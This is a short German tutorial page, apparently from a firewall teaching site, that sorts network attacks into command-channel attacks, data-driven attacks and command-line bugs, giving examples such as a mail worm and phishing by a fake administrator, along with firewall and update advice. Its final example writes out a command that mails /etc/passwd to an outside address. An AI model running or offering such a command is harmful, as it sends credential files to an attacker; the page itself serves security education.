Angriffsarten


Welche Angriffsarten existieren ?

Command-channel attack ( CCA ):

Dies sind Angriffe mit direkten Steuerbefehlen. Die Gefahr besteht darin, daß der Client-Rechner Befehle direkt von außerhalb erhält z.B. beim normalen FTP kann ein manipulierter FTP-Server eine Verbindung zu einem beliebigen Userport öffnen. Eine Firewall kann gegen CCA schützen, indem die Anzahl der Rechner, zudem ein Angreifer Kommandokanäle öffnen kann, eingeschränkt wird, und auf diesen Rechnern abgesicherte Server bereitgestellt werden.

Im weiteren definieren wir CCA1 als Angriffe auf die Systemports und  CCA2 als Angriff auf die Userports.

Data-driven attack ( DDA ):

Bei dieser Art von Attacken handelt es sich um inhaltliche Angriffe, die z.B. den Benutzer veranlassen, gefährliche Programme zu starten Im allgemeinen kann man sagen, daß eine Firewall nichts gegen DDA ausrichten kann, da man in einem Netz Daten die Möglichkeit geben muß, zum Intranet zu gelangen. Andernfalls könnte man noch nicht einmal Mails empfangen. In einigen Fällen ist es möglich gefährliche Situationen zu erkennen und zu vermeiden. Aber im allgemeinen kann man das lokale Netz am Besten durch Schulung der Benutzer schützen.

Beispiele:

Christmastree message: enthielt einen Button, auf dem "push me" stand; wenn der Benutzer diesen Button drückte, erschien ein Weihnachtsbaum auf dem Bildschirm. Intern wurde aber diese Mail an alle im persönlichen Adreßbuch aufgeführten Personen weiter geschickt. Da die Empfänger den Absender immer kannten, wurde der Button fast auch immer gedrückt, was das Internet durch die große und schnelle Verbreitung dieser Mail fast zum Erliegen brachte.

In einer anderen Mail gibt sich der Verfasser als Systemadminstrator aus und verführt den Benutzer dazu sein Paßwort in ein bestimmtes anderes Paßwort zu ändern. Somit konnte der Absender sich ohne Probleme Zugang zum Account des Empfängers verschaffen.

Command-line bug ( CLB ):

Hier handelt es sich um solche Angriffe, die den Ablauf eines Programms modifizieren. Dies bedeutet eine Gefahr für alle Programme, in denen solche Sicherheitslücken existieren. CLB sind eigentlich außerhalb des Verantwortungsbereichs einer Firewall, da jemand, der sie ausführt, sich schon in die Lage manövriert hat, Befehle auf deinem System auszuführen. Dies ist aber gerade die Absicht einer Firewall diese Möglichkeit zu verhindern. Das Ziel ist auf jeden Fall, den fremden Rechner wie ein legitimer Benutzer zu verwenden. Die wohl einfachste Möglichkeit, dies zu erreichen, ist z.B. zu einer schon bekannten Benutzerkennung das Passwort zu erraten. Es wird so lange probiert, bis eine Kombination aus Benutzerkennung und Passwort gefunden wurde. Die beste Möglichkeit einen CLB zu verhindern, besteht in der permanenten Aktualisierung der Software, um so Sicherheitslücken zu reduzieren. Zudem gilt der Grundsatz: Je älter die Software, desto mehr Sicherheitslücken sind bekannt.

Beispiel:

In einer früheren sendmail Version war es möglich, mit mail Cracker@HOME.COM < /etc/passwd die Paßwortdatei eines beliebigen Rechnernetzes zu erhalten.

zurück


Hauptseite Firewall FTP-Dienst Angriffsarten Expermod Links